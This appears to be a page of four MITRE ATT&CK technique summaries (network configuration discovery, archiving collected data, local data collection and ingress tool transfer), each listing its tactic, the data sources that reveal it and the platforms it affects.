Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre